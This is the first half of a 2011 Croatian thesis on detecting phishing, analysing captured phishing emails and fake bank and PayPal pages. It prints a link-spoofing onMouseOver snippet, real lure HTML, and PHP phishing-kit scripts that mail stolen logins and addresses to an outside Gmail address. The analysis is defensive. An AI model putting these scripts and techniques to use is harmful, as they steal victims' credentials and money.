SVEUČILIŠTE U ZAGREBU

FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA

DIPLOMSKI ZADATAK br. 1893

Otkrivanje pokušaja krađe identiteta u Internetu Drago Ružman

Zagreb, rujan 2011.

Sadržaj

1. Uvod .................................................................................................................................... 1

2. Što je phishing ..................................................................................................................... 2

3. Izvedba ................................................................................................................................. 3 3.1 Elektronička pošta ......................................................................................................... 4

3.2 Internet stranice ........................................................................................................... 11 3.3 Tipovi adresa ............................................................................................................... 20

3.4 Tijek novca .................................................................................................................. 23 3.5 Zlonamjerni programi ................................................................................................. 23

4. Trendovi ............................................................................................................................. 24

5. Postojeća zaštita ................................................................................................................. 26

5.1 Organizacije ................................................................................................................ 26 5.2 Sustavi za zaštitu ......................................................................................................... 29

6. Praktičan rad ...................................................................................................................... 32 6.1 Poruke ......................................................................................................................... 33

6.2 Adrese ......................................................................................................................... 33 6.3 Stranice ........................................................................................................................ 34

6.4 Obrasci za unos podataka ............................................................................................ 35 6.5 Grafički elementi ......................................................................................................... 35

6.6 Konačna ocjena ........................................................................................................... 35 6.7 Slabosti sustava ........................................................................................................... 36

6.8 Primjeri uporabe .......................................................................................................... 37 6.9 Testiranje sustava ........................................................................................................ 38

7. Zaključak ........................................................................................................................... 39

8. Literatura ........................................................................................................................... 40

1

1. Uvod

Od svoje prve pojave 1996. godine, napadi sa ciljem krađe identiteta na Internetu (engl. phishing) svake godine imaju sve veće i veće razmjere. Razlog tome je niska cijena i tehnička jednostavnost napada kojim se pogađa velik broj korisnika Interneta, a i sve veći broj korisnika iz zemalja u razvoju koji još nisu spremni na sve izazove koje pruža Internet. Postoje specijalizirane organizacije koje skupljaju informacije o phishing napadima i mnoge kompanije koje pružaju vlastita rješenja za zaštitu od napada. Međutim neki od tih sustava se temelje na korisničkoj dojavi i ni jedan od njih nije u mogućnosti potpuno zaštititi korisnika, a nezanemariv broj korisnika nije dovoljno educiran kako bi sami mogli utvrditi radi li se o napadu ili ne. Zbog toga postoji potreba za jednostavnom detekcijom phishing poruka na svakom poslužitelju elektroničke pošte.

2

2. Što je phishing

Phishing je vrsta krađe osobnih podataka na Internetu. Žrtvu se navodi da ustupi osobne podatke napadaču koji se predstavlja kao legitiman primatelj tih podataka. Kao mamac se obično koristi zlonamjerna poruka elektroničke pošte i Internet stranica koja izgleda legitimno, pa je zbog toga skovan naziv phishing, izvedenica engleske riječi fishing što znači ribarenje.

Prvi napadi dogodili su se 1996. godine kad je AOL onemogućio otvaranje korisničkih računa s lažnim brojevima kreditnih kartica. Cilj je bio prisvojiti tuđe korisničko ime i lozinku za pristup Internetu. Ti prvi napadi su bili vrlo jednostavni. Napadači bi se žrtvama obratili putem poruka elektroničke pošte, predstavili se kao djelatnici AOL-a i izravno tražili potrebne podatke. Iako je suština ostala ista, današnji napadi su puno sofisticiraniji. Žrtva obično dobiva poruku o zloupotrebi svog računa ili o nekom problemu zbog kojeg je potrebna hitna intervencija. U poruci se napadač predstavlja kao član sustava u koji pokušava dobiti ulaz i navodi žrtvu da posjeti internetsku stranicu čija se adresa nalazi u poruci. Internetska stranica je obično vizualno vrlo slična, ako ne i identična, stranici koju se imitira i za koju se pokušavaju skupiti podaci. Početna stranica najčešće sadrži polja za upis korisničkog imena i lozinke, a daljnje stranice mogu sadržavati upite o cijelom nizu osobnih podataka ili pak podataka vezanih uz zadani sustav. Svi uneseni podaci se pohranjuju na poslužitelju te kasnije napadaču mogu poslužiti za neovlašten ulaz.

Ciljani sustavi u koji napadači žele dobiti ulaz mogu biti bilo koji. Najpopularniji su bankarski sustavi, sustavi za internetsko plaćanje, a u novije vrijeme i društvene mreže te masovne internetske igre [1]. Najpoznatije organizacije koje se bore protiv phishinga su Anti-Phishing Working Group (APWG) i PhishTank. APWG je komercijalna organizacija i izdaje besplatne mjesečne izvještaje s detaljnim analizama, dok je PhishTank neprofitna organizacija pod pokroviteljstvom OpenDNS-a i sve njihove informacije su slobodne za upotrebu. Velike kompanije poput Googlea, Microsofta i Symanteca imaju vlastita rješenja za otkrivanje phishing napada. Najpoznatije primjene su Googleov phishing filter u Mozilla Firefoxu i Chromeu te Microsoftov phishing filter u Internet Exploreru. Opera, koja se još uvijek nalazi na popisu 5 najčešće korištenih preglednika, koristi PhishTankov popis phishing stranica. Napadi se uglavnom vrše u svrhu stjecanja financijske koristi. Tu se ubrajaju i napadi ciljani na korisnike masovnih internetskih igara u kojima se uspješni korisnički profili, ali i virtualna dobra prodaju za stvarni novac.

Iako je phishing poznat već dugi niz godina, broj napada i njihova sofisticiranost je s vremenom u konstantnom porastu. To se posebno odnosi na zemlje u razvoju gdje informatička pismenost na vrlo niskoj razini, a Internet sve prisutniji [1].

3

3. Izvedba

Za uspješan phishing napad potrebno je pripremiti Internet stranicu koja je vizualno identična stranicama organizacije na koju se cilja. Zatim je potrebno sastaviti poruku koja žrtvu navodi da posjeti pripremljenu Internet stranicu i upiše tražene podatke. Tu poruku je žrtvi potrebno dostaviti elektroničkom poštom. Da bi žrtva povjerovala poruci, poruka mora biti uvjerljiva. Uvjerljivost se postiže korištenjem stilova i grafika koje imitirana organizacija i inače koristi te tonom poruke koji naglašava važnost i hitnost. Kad korisnik posjeti phishing stranicu, od njega se najčešće traži unos korisničkog imena i lozinke kao i za ulaz na pravu stranicu. Međutim, u nekim napadima se osim ovih osnovnih, traže i mnogi drugi podaci. Moguće je da napadač traži unos sigurnosnih pitanja i odgovora na ta pitanja, a ako se radi o bankama, napadač može tražiti brojeve kreditnih kartica, PIN-ove, datum rođenja, stvarno ime i prezime, te razne druge podatke. Nakon što dođe do žrtvinih podataka, napadač mora djelovati brzo i iskoristiti podatke prije nego žrtva shvati da se radilo o prijevari i zablokira kompromitirane račune. Ako se radi o financijskim institucijama, žrtvin novac se najčešće prebacuje u inozemstvo preko institucija poput eGolda ili Western Uniona. eGold je dugo bio napadačima najomiljeniji alat za ilegalne transakcije jer su vlasnici odbijali vlastima davati bilo kakve informacije o transakcijama koje se provode. To se u novije vrijeme promijenilo, pa istražitelji mogu dobiti podatke koje traže, međutim još uvijek nije moguće zaustaviti jednom pokrenutu transakciju i spriječiti isplatu novca u inozemstvu [3]. Cijeli phishing napad može propasti iz nekoliko razloga. Najranjivije su poruke elektroničke pošte. Budući da se te poruke distribuiraju istim kanalima kao i ostala neželjena pošta, filteri na poslužiteljima elektroničke pošte napadačeve poruke eliminiraju te napad na potencijalnu žrtvu propada. Osim filtera, problem predstavlja masovno širenje poruka, tj. slanje na sve adrese koje napadač posjeduje, pa mnogi primatelji ne koriste usluge imitirane organizacije i napad propada. Phishing poruke i Internet stranice često sadrže greške, što iskusnijeg korisnika navodi na sumnju te napad propada. Ako poruka dođe do prave osobe, i ta osoba postupi prema uputama, onda napadač dobiva vrijedne podatke koje može iskoristiti protiv žrtve.

Prema organiziranosti, napadače je moguće razvrstati u dvije kategorije [4]. Prvu kategoriju je moguće opisati pomoću "handwerker" modela. To su napadači koji rade potpuno samostalno. Jedna osoba kreira stranicu, šalje poruke i iskorištava dobivene podatke. Takvi napadači obično nemaju velike tehničke vještine, pa napadi nisu sofisticirani, što je vidljivo i na realizaciji stranica i poruka. Osim toga, njihovi tekstovi često sadrže pogreške zbog uporabe alata za automatsko prevođenje. Samostalni napadači nemaju fleksibilnost potrebnu za prikrivanje napada, pa često ni ne slute da mjerodavne službe prate sve njihove korake. U drugu kategoriju pripadaju napadači koji rade prema "camorra" modelu. Prema tom modelu napad vrši organizirana skupina. Sudionike skupine je, prema ulozi, moguće razvrstati u 3 kategorije:

1. Dizajneri stranica i poruka. Oni su zaduženi za izradu Internet stranica i poruka elektroničke pošte čij je dizajn vješta imitacija dizajna koji koristi ciljana organizacija.

2. Osiguravatelji smještaja. Oni su zaduženi da stranica bude dostupna na Internetu. Moguće je koristiti zakupljene poslužitelje, druge provaljene stranice ili zaražena računala.

4

3. Financijski agenti. Oni prebacuju novac s kompromitiranih računa na račune koji se nalaze u inozemstvu ili šalju novac putem servisa poput eGolda.

4. Organizatorovi pouzdanici. Oni sakupljaju novac koji im šalju financijski agenti te ga šalju organizatoru.

Ti napadači su visokoorganizirani i svaki od njih dobro zna svoj posao, a osim toga svjesni su da vlasti pokušavaju pratiti njihove aktivnosti te zbog toga ulažu velike napore u skrivanje vlastitih tragova i ostavljanje takvih koji će istražitelje navesti na krivi put.

Pharming napadi su napadi slični phishing napadima. Bitna razlika je da se umjesto poruka elektroničke pošte koristi trovanje DNS poslužitelja, odnosno preusmjeravanje prometa na IP adresu koja je pod kontrolom napadača. Na primjer, moguće je za dio korisnika adresu www.paypal.com preusmjeriti na IP adresu na kojoj se nalazi stranica pod kontrolom napadača, a koja je vizualno identična PayPalovoj. Tako napadač može doći do žrtvinih osobnih podataka, jer žrtva ima mnogo manje mogućnosti da otkrije da se radi o napadu. U stvarnosti je pharming napade vrlo teško izvesti, međutim u slučaju uspjeha gubici su mnogo veći nego kod phishing napada.

Alati kojima se napadači služe nisu poznati, međutim postoje naznake da je na crnom tržištu moguće kupiti gotove alate za stvaranje lažnih stranica i slanje pošte [5]. Uz takve alate, eventualnom napadaču je relativno jednostavno pripremiti tehnički dio napada. Uz to mu ostaje samo organiziranje mreže za skupljanje novca (ukoliko se radi o napadu na financijsku organizaciju). Za slanje pošte može koristiti već aktivne mreže računala zaraženih malicioznim programima za širenje neželjene pošte.

3.1 Elektronička pošta

Većina poruka koje navode primatelja da posjeti neku lažnu Internet stranicu je vrlo sličnog sadržaja. Sve one sadrže poveznicu na lažnu stranicu i tekst koji uvjerava potencijalnu žrtvu da posjeti tu stranicu i ostavi svoje podatke. Razlozi koji se navode mogu biti vrlo raznoliki, međutim najčešći su sljedeći:

• pojavila se greška u osobnim podacima i korisnik ih treba čim prije ispraviti jer će inače njegov račun biti blokiran

• pojavila se sumnjiva transakcija iz inozemstva (za financijske institucije) i korisnik čim prije treba provjeriti o čemu se radi

• dogodio se kvar na poslužiteljima davatelja usluge i korisnik hitno mora obnoviti svoje podatke

U samom početku phishinga poruke su odmah sadržavale i HTML forme u koje je bilo potrebno upisati tražene podatke [6]. Danas više nema takvih poruka. Glavni cilj današnjih poruka je navesti korisnika da posjeti zadanu stranicu i na njoj upiše tražene osobne podatke. Sadržaj poruke elektroničke pošte mora biti formuliran tako da uvjeri primatelja u autentičnost pošiljatelja i istinitost navoda koje sadrži. Da bi se to postiglo, često je u tekstu poruke istaknuta važnost i hitnost postupka na koji se navodi korisnika. Osim toga, poruke sadrže grafičke detalje i stilove koji se i stvarno koriste u organizaciji koju se imitira. Domena adrese pošiljatelja poruke redovito odgovara domeni organizacije.

5

Osim toga, često se skrivaju stvarna odredišta poveznica koje su navedene da ih treba posjetiti [6]. To se ostvaruje pomoću <a href> HTML oznake koju je moguće upotrijebiti tako da adresa prikazana na ekranu i stvarno odredište budu različiti. Pomoću onMouseOver javascript naredbe je moguće sakriti pravu destinaciju koja se ispisuje u statusnoj traci na dnu prozora internet preglednika. Na slici 3.1 je dan primjer uporabe onMouseOver javascript naredbe. <a href="http://www.attack.com" onMouseOver="window.status='http://www.paypal.com'; return true;" onMouseOut="window.status=''; return true;">http://www.paypal.com </a>

Slika 3.1: Primjer uporabe <A HREF> i onMouseOver

Iako napadači nastoje sastaviti čim bolju i uvjerljiviju poruku, uvijek postoje nedostaci u tekstu zbog kojih bi oprezniji korisnik mogao shvatiti da se radi o prijevari. Velik broj poruka je gramatički ili pravopisno neispravan, pa to odmah može pobuditi sumnju budući da ni jedna ozbiljna kompanija ne bi slala takve poruke. Tekstovi poruka gotovo redovito započinju potpuno općenito poput "Dear paypal user" ili "Dear valued costumer". To je posljedica načina distribucije poruka. Ista se poruka šalje velikom broju korisnika, pa nije moguće pojedinačno prozivanje. Osim toga, napadači najčešće nemaju informacija o korisnicima organizacija koje imitiraju pa ne znaju kome treba poslati poruke. To bi odmah trebalo navesti primatelja poruke da razmisli o autentičnosti budući da svaka organizacija zna imena svojih članova.

Dok god adresa pošiljatelja izgleda legitimno, dio korisnika će povjerovati da je poruka autentična. Međutim, pošiljatelj može biti bilo tko jer je u zaglavlju poruke relativno jednostavno krivotvoriti adresu pošiljatelja. Zbog načina rada elektroničke pošte, stvarni pošiljatelj može naći poslužitelja elektroničke pošte koji neće provjeriti da se adresa pošiljatelja i IP adresa s koje se šalje podudaraju, pa je pod adresu pošiljatelja moguće upisati gotovo bilo koju adresu. A da se ne bi izazvala sumnja, u tekstu se često navodi da je ovo automatski generirana poruka i da se upiti ne šalju na tu adresu jer odgovora neće biti. Detaljnim proučavanjem zaglavlja moguće je vidjeti da se IP adresa stvarnog pošiljatelja ne nalazi u rasponu adresa koje koristi imitirana kompanija te da je poruka zapravo lažna. Javascript se u poruci, osim za skrivanje stvarnih destinacija poveznica, može iskoristiti i za preuzimanje nepoželjnih programa (engl. malware) na računalo. Takvi programi kasnije na razne načine mogu doći do korisnikovih lozinki i drugih osobnih podataka.

Phishing poruke se žrtvama distribuiraju već uhodanim kanalima masovnog slanja neželjene pošte (engl. spam). Tu se nalazi i prvi korak zaštite jer će dobar filter pošte uz ostale neželjene poruke izbaciti i phishing poruke, pa do stvarnog napada nikad neće doći. Neželjena pošta se uglavnom distribuira preko umreženih računala zaraženih nekim od zlonamjernih programa (engl. botnets). Jedan od najpoznatijih programa je Storm crv [7]. Njega korisnici obično dobiju elektroničkom poštom. Kad korisnik preuzme poruku i pokrene privitak (engl. attachment), crv se instalira na računalo i pretraži sve dokumente za adresama elektroničke pošte. Nakon toga se spaja na druga zaražena računala, pokupi tamo pronađene adrese i njima svima dostavi adrese koje je on pronašao. Nakon toga su sva zaražena računala spremna da proslijede bilo kakvu poruku na sve adrese koje posjeduju.

6

Na slikama 3.2, 3.3 i 3.4 je dan prikaz jedne tipične phishing poruke. Ova poruka nije bila dostavljena žrtvi jer je na žrtvinom poslužitelju označena kao neželjena pošta. Na slikama 3.5, 3.6 i 3.7 je prikazana još jedna phishing poruka. Ta poruka cilja na korisike talijanske banke Banca di Roma. Obje poruke su zaustavljene prilikom prolaska kroz filter na poslužitelju iluvator.zemris.fer.hr. Return-Path: <> Delivered-To: bad-header-quarantine X-Envelope-From: <akstcablusitaniamnsdgs@ablusitania.com> X-Envelope-To: <xxxxx@zemris.fer.hr> X-Quarantine-ID: <H9sFFq+f5D5i> X-Amavis-Alert: BAD HEADER Non-encoded 8-bit data (char AE hex): Subject: PayPal\256 Account Review[...] X-Spam-Flag: NO X-Spam-Score: 4.973 X-Spam-Level: **** X-Spam-Status: No, score=4.973 tag=3 tag2=6.3 kill=6.3 tests=[BAYES_50=0.001, HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001, HTML_SHORT_LINK_IMG_3=0.001, MIME_HTML_ONLY=1.457, RCVD_IN_BL_SPAMCOP_NET=1.96, SUBJECT_NEEDS_ENCODING=0.001] Received: from iluvatar.zemris.fer.hr ([127.0.0.1]) by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id H9sFFq+f5D5i for <xxxxx@zemris.fer.hr>; Sat, 5 Apr 2008 05:59:13 +0200 (CEST) Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by iluvatar.zemris.fer.hr (Postfix) with ESMTP id 7E34D13C2B6 for <xxxxx.xxxxxxxxx@zemris.fer.hr>; Sat, 5 Apr 2008 05:59:13 +0200 (CEST) Received: from archimede (host206-219-dynamic.7-87-r.retail.telecomitalia.it [87.7.219.206]) by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m354028j010913; Sat, 5 Apr 2008 06:00:04 +0200 (CEST) Received: from [87.7.219.206] by mail.ablusitania.com; Sat, 5 Apr 2008 05:00:04 +0100 Date: Sat, 5 Apr 2008 05:00:04 +0100 From: support@paypal.com X-Mailer: The Bat! (v3.5.25) Educational Reply-To: akstcablusitaniamnsdgs@ablusitania.com X-Priority: 3 (Normal) Message-ID: <378668938.73675501365543@ablusitania.com> To: xxxxx.xxxxx@fer.hr Subject: PayPal® Account Review Department MIME-Version: 1.0 Content-Type: text/html; charset=Windows-1252 Content-Transfer-Encoding: 7bit

Slika 3.2: Zaglavlje phishing poruke

7

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML><HEAD><TITLE></TITLE> </HEAD> <BODY> <style type="text/css"> <!-- style3 {font-size: 14px} style4 {font-size: 12px; } --> </style> <table width="522" border="0"> <tr> <td><a href="https://www.paypal.com"><img src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35" border="0" /></a></td> </tr> <tr> <td width="516"><P class="style3">Dear <strong>PayPal &reg;</strong> customer,</P> <P class="style3">We recently reviewed your account, and we suspect an unauthorized transaction on your account.<BR> Protecting your account is our primary concern. As a preventive measure we have temporary<strong> limited</strong> your access to sensitive information.<BR> Paypal features.To ensure that your account is not compromised, simply hit "<strong>Resolution Center</strong>" to confirm your identity as member of Paypal.</P> <ul class="style3"> <li> Login to your Paypal with your Paypal username and password.</U></li> <li> Confirm your identity as a card memeber of Paypal.</U></li></ul> <P class="style3"> </P> <TABLE cellSpacing=0 cellPadding=5 width="100%" align=center bgColor=#ffeeee> <TBODY> <TR> <TD class="style3"><SPAN class=emphasis>Please confirm account information by clicking here <A href="http://www.cancantheclown.com/np/paypal.com/index.html"target="_self">Resolution Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD> </TR> </TBODY> </TABLE> <P class="style4"> </P> <P class="style4"><strong>*</strong>Please do not reply to this message. Mail sent to this address cannot be answered.</P> <P><span class="style <P><span class="style3">Copyright © 1999-2008 PayPal. All rights reserved.<BR> </BODY></HTML>

Slika 3.3: Tijelo phishing poruke

8

Slika 3.4: PayPal phishing poruka

9

Return-Path: <> Delivered-To: spam-quarantine X-Envelope-From: <clienti@bancaroma.it> X-Envelope-To: <xxxxxxx@zemris.fer.hr> X-Quarantine-ID: <J5abCCxKqTj3> X-Spam-Flag: YES X-Spam-Score: 10.25 X-Spam-Level: ********** X-Spam-Status: Yes, score=10.25 tag=3 tag2=6.3 kill=6.3 tests=[BAYES_50=0.001, FORGED_MUA_OUTLOOK=3.116, FORGED_OUTLOOK_HTML=0.001, HIDE_WIN_STATUS=2.499, HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001, MIME_HTML_ONLY=1.457, MSGID_FROM_MTA_HEADER=0.803, MSOE_MID_WRONG_CASE=0.82] Received: from iluvatar.zemris.fer.hr ([127.0.0.1]) by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id J5abCCxKqTj3 for <marcupic@zemris.fer.hr>; Sat, 5 Apr 2008 20:38:09 +0200 (CEST) Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by iluvatar.zemris.fer.hr (Postfix) with ESMTP id AEAC313C2BB for <xxxxx.xxxxx@zemris.fer.hr>; Sat, 5 Apr 2008 20:38:09 +0200 (CEST) Received: from vestelitaly.com (host83-226-static.18-80-b.business.telecomitalia.it [80.18.226.83]) by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m35Id3OZ011891 for <xxxxx.xxxxx@fer.hr>; Sat, 5 Apr 2008 20:39:04 +0200 (CEST) Message-Id: <200804051839.m35Id3OZ011891@labs3.cc.fer.hr> Received: from User by vestelitaly.com (MDaemon PRO v9.6.2) with ESMTP id md50000460184.msg for <xxxxx.xxxxx@fer.hr>; Sat, 05 Apr 2008 16:11:48 +0200 From: "UniCredit Banca Di Roma"<clienti@bancaroma.it> Subject: Comunicazione Urgente Banca di Roma - Servizio Clienti Date: Sat, 5 Apr 2008 09:58:40 -0400 MIME-Version: 1.0 Content-Type: text/html; charset="Windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Authenticated-Sender: info@vestelitaly.com X-Spam-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:48 +0200 (not processed: message from trusted or authenticated source) X-MDRemoteIP: 24.11.178.38 X-Return-Path: clienti@bancaroma.it X-Envelope-From: clienti@bancaroma.it X-MDaemon-Deliver-To: xxxxx.xxxxx@fer.hr X-MDAV-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:53 +0200 Apparently-To: <xxxxx.xxxxx@fer.hr> To: undisclosed-recipients:;

Slika 3.5: Zaglavlje phishing poruke

10

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Comunicazione Urgente</title> </head> <body> <div style="width: 600px; margin: 0 auto 0 auto; border: 0px dashed black; padding: 20px 15px 1px 15px; font-size: 12px"> <img src="http://image.bayimg.com/daihoaabb.jpg" width="600" height="60" /> <br><br><b>Gentile CLIENTE ,</b><br><br> <p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">Nell'ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Banca Di Roma e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale. </p> <p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">L'inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione. </p> <p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">Per ovviare al problema e necessaria la verifica e l'aggiornamento dei dati relativi all'anagrafica dell'Intestatario dei servizi bancari. </p> <p style="font-weight: bold; color: #072510; font-family: arial;" align="justify"> Effetuare l'aggiornamento dei dati cliccando sul seguente collegamento sicuro: <p style="font-weight: bold; color: #074580; font-family: arial;" align="center"> <a style="color: #074580" href="http://c-24-130-151-178.hsd1.ca.comcast.net/bancaroma.it/Roma.php?applicazione=index.asp">Accedi a collegamento sicuro >></a></p> </a><a onmouseover="rollem('2');window.status='';return true;" onmouseout="hidem('2');" </a></td> <div align="center" style="margin-top: 20px;MARGIN-BOTTOM: 10px; COLOR: #666666; font-family: arial; text-align: center; background-image: url('http://www.chase.com/ccpmweb/generic/image/footer_gradient.gif'); height: 30px">Copyright 2000 / 2008 Unicredit Banca di Roma - Privacy - Norme di trasparenza - Partita IVA 06978161005 </div> </body> </html>

Slika 3.6: Tijelo phishing poruke

11

Slika 3.7: Banca di Roma phishing poruka

3.2 Internet stranice

Početna stranica na koju pokazuje adresa u dobivenoj poruci je najčešće identična kopija početne stranice organizacije koju se imitira. Međutim, ako zbog specifične namjene (krađa podataka) nije identična, i onda se koriste jednaki stilovi, grafike i logotipovi kao i na originalu.

12

Najjednostavniji model lažne stranice sastoji se od gotovo doslovno prepisanog HTML i CSS koda s originala uz jednu bitnu izmjenu. Da bi napadač došao do lozinki, mora preusmjeriti adresu na koju će se proslijediti podaci nakon pritiska na gumb "SUBMIT" ili "LOGIN". To se postiže kreiranjem jednostavne PHP skripte na poslužitelju koja ovisno o izvedbi prihvaća GET ili POST zahtjeve te pohranjuje dobivene podatke. Nakon kreiranja PHP skripte, još je jedino potrebno ubaciti adresu skripte u FORM oznaku u HTML dokumentu. Lažnu stranicu je relativno jednostavno postaviti na Internet. Postoji nekoliko mogućnosti. Prva je da se koristi besplatni poslužitelj poput freesitespace.com ili awardspace.com. To je potpuno besplatna i relativno anonimna varijanta. Druga mogućnost je zakup prostora na poslužitelju u zemljama koje nemaju definirane zakone o računalnom kriminalu. Treća mogućnost je izgradnja mreže zaraženih računala (engl. botnets) koja će služiti kao HTTP poslužitelji [8]. Jedna takva mreža može dati veliku fleksibilnost i dosta dug životni vijek stranice. Prilikom upotrebe besplatnih poslužitelja, vrijeme gašenja stranice je relativno kratko. Međutim, ako se koristi plaćeni hosting, pogotovo u zemljama dalekog istoka, onda gašenje stranice može potrajati i do mjesec dana.

Povremeno su potrebne neke izmjene na lažnoj stranici da bi ona mogla služiti svojoj svrsi. Prilikom tih izmjena može doći do gramatičkih ili pravopisnih grešaka, pogotovo ako se radi o stranici koja nije na engleskom jeziku. Tako se na stranicama koje imitiraju češku financijsku stranicu servis24.cz često pojavljuju izmiješani dijelovi češkog i engleskog teksta što bi potencijalnu žrtvu sigurno trebalo navesti na sumnju. Prikaz jedne takve stranice dan je na slici 3.8. Stranica je bila smještena na adresi http://host81-149-81-234.in-addr.btopenworld.com/www1.servis24.cz/index.htm.

Nakon što korisnik unese svoje podatke i pritisne gumb za ulaz, najčešće se ne dogodi ništa. Ali samo prividno. Ako napadač nema namjeru doći do drugih podataka osim korisničkog imena i lozinke, onda redovito preusmjerava korisnika na originalnu stranicu na koju je htio ući. To može zbuniti korisnika, ali vjerojatno u tom slučaju korisnik pretpostavi da se radilo o grešci i pokuša ponovno. Podaci s kojima korisnik pokuša ući na lažnu stranicu se često ne provjeravaju u bazi korisnika originalne stranice. To omogućuje da se na lažnu stranicu unesu bilo kakvi podaci i ulaz će proći, tj. neće biti dojave o nepoznatom korisničkom imenu ili pogrešnoj lozinki. Jedina za sad poznata iznimka su plagijati stranica talijanske banke Banca di Roma (svi pronađeni) i neki plagijati aukcijske kompanije eBay.

Prilikom izrade lažne stranice sve poveznice osim one za slanje osobnih podataka i dalje ostaju pokazivati na dijelove originalne stranice. Tako često ostaju dostupna, a povremeno i istaknuta, upozorenja o phishingu i zaštiti osobnih podataka. To dodatno može zbuniti sumnjičave korisnike i uvjeriti ih da je stranica prava.

Na Internet stranicama se često događaju manje izmjene vezane uz dizajn i podatke koji će biti prikazani. Kad napadači odluče iskopirati neku stranicu i pripremiti napad, oni kopiraju original koji im je dostupan u tom trenutku. U sljedećem trenutku taj original već može biti promijenjen. Zbog toga povremeno dolazi do upotrebe zastarjelih kopija za napad. To bi česte posjetitelje originala moglo navesti na sumnju jer se u stvarnosti ne radi povratak na prethodni dizajn.

13

Slika 3.8: Stranica za napad na korisnike servis24.cz

Prilikom prijenosa osobnih podataka preko Interneta savjesne institucije redovito vezu osiguravaju SSL, odnosno TLS protokolom kako bi se izbjeglo prisluškivanje i krađa podataka. Kod učitavanja stranice osigurane SSL/TLS-om svaki Internet preglednik raznim znakovima upozorava korisnika da se radi o sigurnoj vezi. Najčešći znakovi sigurne veze su istaknuti HTTPS protokol umjesto HTTP i promijenjena boja adresne trake te sličica lokota u statusnoj traci na dnu preglednika. Prilikom upotrebe SSL/TLS-a stranica koja se učitava mora prikazati valjani certifikat koji je potpisala agencija za izdavanje certifikata. Ako je istekao rok valjanosti certifikata ili ako potpisnik certifikata nije poznat, preglednik javlja da certifikat nije u redu i da postoji mogućnost od kompromitiranja sigurne veze. Budući da je u certifikat upisana i potpisana adresa stranice na koju se on odnosi nije moguće prenijeti certifikat s jedne stranice na drugu. Zbog toga varalice izbjegavaju upotrebu sigurne veze. Ako bi uzeli originalni certifikat, on ne bi bio valjan jer je namijenjen za drugu stranicu. Ako

14

bi pak išli u izradu certifikata, taj certifikat ne bi htjela potpisati ni jedna pouzdana agencija. Da korisnik ne bi postao sumnjičav u pogledu sigurnosti prijenosa podataka, znakovi sigurne veze u pregledniku nadoknađuju se sa znakovima sigurne veze (npr. SSL lokotom) i tekstovima o sigurnosti na samoj stranici. Iz toga iskusni korisnik lako može zaključiti da se radi o prijevari, međutim manje iskusni će povjerovati da je stranica potpuno sigurna.

Na slikama 3.9-3.11 je prikazana stranica koja se koristila za napad na korisnike Halifaxa. Na slikama 3.12 i 3.13 je prilazan primjer napada na korisnike PayPala. Stranica je bila aktivna na http://202.158.145.88/ePMS/paypal/profile/account/ security/index.html. Početna stranica je bila identična originalnoj, a nakon unosa korisničkog imena i lozinke korisnik bi bio preusmjeren najprije na stranicu na slici 3.12, a zatim na stranicu na slici 3.13. Prilikom pritiska na gumb za ulaz na glavnoj stranici izvršila se skripta verify.php prikazana na slici 3.14, a prilikom pritiska na gumb SUBMIT na slikama 3.12 i 3.13 izvršile su se skripte step2.php i step3.php prikazane na slikama 3.15 i 3.16.

Slika 3.9: Primjer lažne Halifax stranice

15

Slika 3.10: Dodatni obrazac na lažnoj Halifax stranici

16

Slika 3.11: Unos osobnih podataka na lažnoj Halifax stranici

17

Slika 3.12: Primjer lažne PayPal stranice

18

Slika 3.13: Unos podataka na lažnoj PayPal stranici

19

<? session_start(); $Email = $_POST['Email']; $Password = $_POST['Password']; //sending email info here $ip = getenv("REMOTE_ADDR"); $subj = "IP - $ip | PayPal | - Login -"; $msg = "IP: $ip\n\nEmail: $Email\nPassword: $Password"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing1.html"); ?>

Slika 3.14: Ispis skripte verify.php

<? session_start(); $pa = $_POST['pa']; $pc = $_POST['pa']; $ps = $_POST['pa']; $pz = $_POST['pa']; //sending email info here $ip = getenv("REMOTE_ADDR"); $subj = "IP - $ip | PayPal | - Step2 - "; $msg = "IP: $ip\n\nPrevious Street Address: $pa\nPrevious City: $pc\nPrevious State: $ps\nPrevious Zip: $pz"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing3.html"); ?>

Slika 3.15: Ispis skripte step2.php

20

